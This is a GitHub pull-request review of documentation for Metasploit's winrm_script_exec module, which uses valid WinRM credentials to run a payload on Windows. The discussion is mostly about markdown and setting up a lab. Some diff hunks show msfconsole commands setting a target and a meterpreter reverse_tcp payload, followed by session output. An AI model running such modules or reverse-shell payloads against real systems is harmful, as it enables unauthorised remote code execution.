Documentation on winrm_script_exec #8130
Conversation
I'll check it out in a few hours
@hoodie I also need to know what will happen when we get a successful meterpreter session. I can't get a successful session and hence I cannot write the documentation further. Thanks in advance.
## Vulnerable Application | ||
|
||
Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. | ||
IMPORTANT: If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. |
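Review bot: "Poweshell" is misspelled twice in this hunk ("check if Poweshell 2.0 is available" and "with the Poweshell method") and "targetting" should be "targeting"; the product's own capitalisation is "PowerShell", so use that throughout. The paragraph also expands SOAP in the same sentence that names WS-Management, which is fine, but once the text is split into separate paragraphs keep the expansion to a single occurrence.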
let's bold IMPORTANT and add an extra newline before it (so it's on its own line)
How do I bold in github using this " ** bolded text ** "? How do I add an extra line in an md file in github? Just by using the 'Enter' key, or is there some other process?
**bold**
bold
yea just hit enter again to add an extra newline.
In markdown if an item is on a new line (line 3 and 4) when processed it's kept on the same line. If there is an EMPTY line between, it's treated as a new line when interpreted.
|
||
Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. | ||
IMPORTANT: If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. | ||
[EXPLOIT DB:] https://www.exploit-db.com/exploits/22526/ |
don't think this is needed, I think you can remove it
Remove which part? The exploit db source or the entire portion?
edb portion
@@ -0,0 +1,67 @@ | |||
## Vulnerable Application | |||
|
|||
Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. |
I think this is Vista and newer since #995 references win8
LPORT => 4444 | ||
msf exploit(winrm_script_exec) > set RHOST 192.168.198.130 | ||
RHOST => 192.168.198.130 | ||
msf exploit(winrm_script_exec) > show options |
no need to have the show options since you show all the items which were set
There are some default configurations given in the 'show options' which I have not added, like the URI, SRVPORT etc. Should I remove it still?
yea, if it's default, there's no need to show that it wasn't changed.
@@ -0,0 +1,67 @@ | |||
## Vulnerable Application | |||
|
|||
Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. |
Check out #995 there may be some comments about configuration changes etc.
If you have to install WinRM or configure it in any way other than a default win install, it would be great to include those as well.
Will check for sure..
https://msdn.microsoft.com/en-us/library/aa384372%28v=vs.85%29.aspx
https://msdn.microsoft.com/en-us/library/aa384372%28v=vs.85%29.aspx
https://support.microsoft.com/en-in/help/2019527/how-to-configure-winrm-for-https
Are these three links enough for the later part of your comment?
I generally like it when the markdown has a step by step for configuring (if not default), the doc should be self contained as much as possible.
Still not sure if that would be needed, however see https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/centreon_useralias_exec.md#creating-a-testing-environment for an example
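The reviewer above asks for a self-contained, step-by-step description of how the test environment is configured when WinRM is not in its default state. The script below is an added example written for this thread, not code from the PR, the Metasploit documentation or the Microsoft pages linked above. It audits the WinRM state that matters for this module (PowerShell version, service state, listeners, authentication settings) and then enables the default HTTP listener on an isolated lab host; the HTTPS listener step is left commented out and uses placeholder values for the host name and certificate thumbprint, which are not taken from the page.

```powershell
# Added example (not part of the PR or the Metasploit docs): audit, and if
# needed enable, WinRM on an isolated lab host so both of the module's payload
# delivery paths (PowerShell 2.0 and VBS CmdStager) can be exercised.
# Run from an elevated PowerShell prompt on the lab host itself.

Write-Output "PowerShell version (the module uses the PowerShell path only if 2.0 or later is present):"
$PSVersionTable.PSVersion

Write-Output "WinRM service state (WMI is used so this also works on 2008-era hosts):"
Get-WmiObject Win32_Service -Filter "Name='WinRM'" | Select-Object Name, State, StartMode

Write-Output "Configured listeners (HTTP is port 5985, HTTPS is port 5986 by default):"
winrm enumerate winrm/config/listener

Write-Output "Service settings, including the enabled authentication methods and AllowUnencrypted:"
winrm get winrm/config/service

# --- Enabling WinRM for the test environment ---------------------------------
# Creates the default HTTP listener, starts the service, sets it to start
# automatically and adds the firewall exception. This is the cmdlet form of
# 'winrm quickconfig -q'. Only do this on a host that exists for testing.
Enable-PSRemoting -Force

# --- Optional HTTPS listener -------------------------------------------------
# Placeholder values (assumptions for this example): replace with the lab host's
# FQDN and the thumbprint of a certificate in Cert:\LocalMachine\My whose
# subject matches that name.
# New-WSManInstance -ResourceURI winrm/config/Listener `
#     -SelectorSet @{ Address = '*'; Transport = 'HTTPS' } `
#     -ValueSet @{ Hostname = 'lab-host.example.test'; CertificateThumbprint = 'THUMBPRINT_PLACEHOLDER' }

# Confirm the service answers WS-Management requests. From another machine the
# same check is: Test-WSMan -ComputerName <lab-host>
Test-WSMan -ComputerName localhost
```

The audit half is the part worth pasting into the module's markdown: recording the PowerShell version and the listener/authentication output next to each example session makes it obvious later why one run took the PowerShell path and another fell back to the VBS CmdStager.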
#995 isn't using any payload. Should I remove the lines:
+msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
you could try it, but when you don't set a payload msf attempts to set a default compatible payload, so it more than likely just defaulted to something.
I made the requested changes except the part of installing WinRM and configuring it. I am googling about those and I'll make changes soon. @h00die
|
||
|
||
## Example Usage | ||
|
### Windows 2008
**Powershell 2.0 is used for payload delivery here**
I'd add that so we know what the target is. (don't add the triple ticks, that's just so it doesn't auto-format on the comment)
msf exploit(winrm_script_exec) > set RHOST 192.168.198.130 | ||
RHOST => 192.168.198.130 | ||
|
||
**Powershell 2.0 is used for payload delivery here** |
remove this line, it'll be outside of the code block
meterpreter > getpid | ||
Current pid: 568 | ||
meterpreter > | ||
|
end the code block here (triple ticks)
meterpreter > | ||
|
||
**In case the VBS CmdStager is used for payload delivery here** | ||
|
start a new code block here
Should I start a code block using triple ticks too? And are triple ticks '###' ?
` x3, and yup
meterpreter > | ||
|
||
|
||
|
remove all these extra newlines at the end here. you can keep one
PS docs are looking good so far, a few minor touchups and this should be land-able this weekend. Docs seem easy, take someone's work and just run it, copy+paste, and done. However, as has been noted by other r7 people, it's actually pretty time consuming to set up the environment, write down any changes or oddities (like vbs vs psh here). While it won't get you glory, it makes a big difference when someone looks at the module a few years later, or it isn't working for some reason. So thanks for spending the time and knocking this one out!
@h00die Writing the docs is helping me learn how to use the exploits. I am a GSOC aspirant and I've got one month to prove myself. So I'll work on the docs and also some other minor issues this month to get the hang of the basics of how things work, and it is a great honor to work for Metasploit whether I get selected for GSOC or not.
|
||
## Example Usage | ||
|
||
## Windows 2008 |
add one more #
here
One more '#' as in it should look like:
+### Example Usage
+
+### Windows 2008
WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). | ||
This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. | ||
|
||
**IMPORTANT:-** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. |
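Review bot: the first sentence of this hunk has a stray comma after "WinRM," and spells out Simple Object Access Protocol, and the very next sentence expands it again as "SOAP (Simple Object Access Protocol)"; drop the first expansion and introduce the acronym once. "Poweshell" and "targetting" are still misspelled in this revision (twice and once respectively), and "Powershell" should be "PowerShell".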
remove the -
here
|
||
``` | ||
|
||
**In case the VBS CmdStager is used for payload delivery here** |
Change this to be **VBS CmdStager is used for payload delivery here**
[*] Current server process: mSPvA.exe (3548) | ||
[+] Migrating to 580 | ||
[+] Successfully migrated to process | ||
[*] nil |
this line is funny to me, nothing you did, but prob a print in the module that didn't check it was nil before printing it. at least it didn't crash!
Tell me what changes I should make
any other changes or things you're waiting on for this, I think it's ready to go, just want to double check
|
||
**IMPORTANT:** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. | ||
|
||
### Example Usage |
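Review bot: the IMPORTANT line in this hunk still carries the "targetting" and "Poweshell" typos ("targeting", "PowerShell"); since this is the one line readers are told to pay attention to, fix it before landing. The bold marker is now correct and the "-" after the colon is gone, as requested earlier.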
2 # here
|
||
### Example Usage | ||
|
||
### Windows 2008 |
3 here (like it is now, its good)
Release Notes: Documentation for the
GitHub issue: KB for exploit/windows/winrm/winrm_script_exec fixes #7129
Documentation